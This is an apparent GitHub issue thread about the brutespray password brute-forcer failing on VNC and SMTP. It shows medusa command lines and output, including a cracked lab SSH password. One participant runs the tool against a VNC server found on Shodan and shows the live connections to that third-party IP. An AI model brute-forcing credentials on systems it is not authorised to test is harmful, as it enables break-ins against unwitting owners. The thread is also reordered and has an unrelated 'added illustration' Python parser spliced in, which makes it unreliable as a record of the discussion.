Closed tokyoneon closed 6 years ago
When you are running brutespray you specify /root/Desktop/brutespray.xml, but your nmap is /root/Desktop/brutespray.gnmap. Would that be the issue? Does the xml file exist?
I guess it should exist since it looks like medusa seems to start up...
I'm thinking the error might be occurring because parsing the xml will probably show vnc-1 vs vnc. I think the matching there might fail.
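The service-name mismatch suggested above is easy to reproduce on the .gnmap format. The following is an added illustration, not brutespray's own parser: it reads a constructed greppable-nmap sample (the sample and the `service_family` helper are assumptions of this example; nmap's port table labels 5901 as `vnc-1` rather than `vnc`), and shows how an exact match on `vnc` silently selects zero targets, which is consistent with a tool that then exits without any error. Normalising the numeric suffix, or logging when no host matches the requested service, makes that failure visible.

```python
import re

# Constructed .gnmap content for this example (not from the issue).
# The simple splitter below assumes version strings contain no ", ".
SAMPLE_GNMAP = """\
# Nmap 7.70 scan initiated as: nmap -sV -oG brutespray.gnmap 192.168.1.103
Host: 192.168.1.103 ()\tStatus: Up
Host: 192.168.1.103 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.4p1/, 25/open/tcp//smtp//Postfix smtpd/, 5901/open/tcp//vnc-1//VNC (protocol 3.8)/, 5902/filtered/tcp//vnc-2///\tIgnored State: closed (996)
# Nmap done
"""


def parse_gnmap(text):
    """Yield (host, port, proto, service) for every open port in a .gnmap file.

    Each "Ports:" entry is port/state/proto/owner/service/rpc/version.
    """
    for line in text.splitlines():
        if not line.startswith("Host:") or "\tPorts:" not in line:
            continue
        host = line.split()[1]
        ports_field = line.split("\tPorts: ", 1)[1].split("\t", 1)[0]
        for entry in ports_field.split(", "):
            fields = entry.split("/")
            if len(fields) < 5:
                continue
            port, state, proto, _owner, service = fields[:5]
            if state == "open":
                yield host, int(port), proto, service


def service_family(name):
    """Strip nmap's numeric suffix: 'vnc-1' -> 'vnc'; 'vnc-http' is left alone."""
    return re.sub(r"-\d+$", "", name)


def select_targets(text, wanted, normalize=True):
    """Return [(host, port)] whose service matches `wanted`.

    With normalize=False this is the strict comparison that silently yields
    an empty list for 'vnc' when nmap reported 'vnc-1'.
    """
    key = service_family if normalize else (lambda s: s)
    return [(h, p) for h, p, _proto, s in parse_gnmap(text) if key(s) == wanted]


if __name__ == "__main__":
    for strict in (False, True):
        hits = select_targets(SAMPLE_GNMAP, "vnc", normalize=not strict)
        if not hits:
            print("strict match: no host offers service 'vnc' (check nmap's service label)")
        else:
            print("normalised match:", hits)
```

The empty-result branch is the point: a selection step that returns nothing should say so before the tool proceeds to a brute-force phase that has no work to do.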
Oh, sorry, forgot to clarify, I was alternating between an xml and gnmap. I got the same results using either. Just modified the gnmap and removed the "-1" and got this output:
Starting to brute, please make sure to use the right amount of threads(-t) and parallel hosts(-T)...
Output will be written to the folder: ./brutespray-output/ \
Brute-Forcing...
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT CHECK: [vnc] Host: 192.168.1.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: 123456 (1 of 60 complete)
ACCOUNT CHECK: [vnc] Host: 192.168.1.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: 123456789 (2 of 60 complete)
It started this time but stopped after 2 password attempts.
Tried changing medusa's verbosity level in the script, thought it might help debug.
p = subprocess.Popen(['medusa', '-v 6','-H', fname, uarg, userlist, parg, passlist, '-M', service, '-t', args.threads, '-n', port, '-T', args.hosts, cont], stdout=subprocess.PIPE, stderr=subprocess.PIPE, bufsize=-1)
Got this:
Starting to brute, please make sure to use the right amount of threads(-t) and parallel hosts(-T)...
Output will be written to the folder: ./brutespray-output/ \
Brute-Forcing...
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
GENERAL: Parallel Hosts: 1 Parallel Logins: 2
GENERAL: Total Hosts: 1
GENERAL: Total Users: 1
GENERAL: Total Passwords: 60
GENERAL: Medusa has finished.
What's interesting is bruteforcing SSH still works.
> ./brutespray.py --file '/root/Desktop/brutespray.gnmap' --username user --passlist '/root/Desktop/passwords.list' --service ssh
Starting to brute, please make sure to use the right amount of threads(-t) and parallel hosts(-T)...
Output will be written to the folder: ./brutespray-output/ \
Brute-Forcing...
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
GENERAL: Parallel Hosts: 1 Parallel Logins: 2
GENERAL: Total Hosts: 1
GENERAL: Total Users: 1
GENERAL: Total Passwords: 60
ACCOUNT CHECK: [ssh] Host: 192.168.1.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: 123456789 (1 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: 123456 (2 of 60 complete)
...
ACCOUNT CHECK: [ssh] Host: 192.168.1.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: 11111111 (58 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: wonderhow2 (59 of 60 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.103 User: user Password: wonderhow2 [SUCCESS]
GENERAL: Medusa has finished.
Thought maybe it was my test SMTP/VNC servers but just tried using brutespray on a VNC server I found on Shodan. Using lsof I could see medusa established a connection to the server (79.173.XX.XXX:5901) for a few moments...
> watch lsof -i
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
medusa 5533 root 6u IPv4 27857 0t0 TCP 192.168.1.17:36604->79.173.XX.XXX:5901 (ESTABLISHED)
medusa 5533 root 7u IPv4 27858 0t0 TCP 192.168.1.17:36606->79.173.XX.XXX:5901 (ESTABLISHED)
But no output in my brutespray terminal.
Starting to brute, please make sure to use the right amount of threads(-t) and parallel hosts(-T)...
Output will be written to the folder: ./brutespray-output/ \
Brute-Forcing...
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
GENERAL: Parallel Hosts: 1 Parallel Logins: 2
GENERAL: Total Hosts: 1
GENERAL: Total Users: 1
GENERAL: Total Passwords: 60
GENERAL: Medusa has finished.
I tested on VNC on Metasploitable2, and it worked just fine. SMTP required an AUTH:PLAIN or AUTH:LOGIN argument, which I added. I also enabled medusa errors to print out.
v1.6.0, found in Kali, stopped working, so I tried cloning the git. But that didn't help. I'm not sure if this is a bug or maybe I'm misunderstanding the usage.
That's it, brutespray just quits with no warnings or errors. This happens with or without the --service and --output args. Brutespray worked fine with SSH until I tried SMTP and VNC. I thought maybe it was my Nmap outputs but here's what I'm working with:
Read the file:
Nmap output:
The installation seemed to go over well:
And medusa is installed.
Any ideas?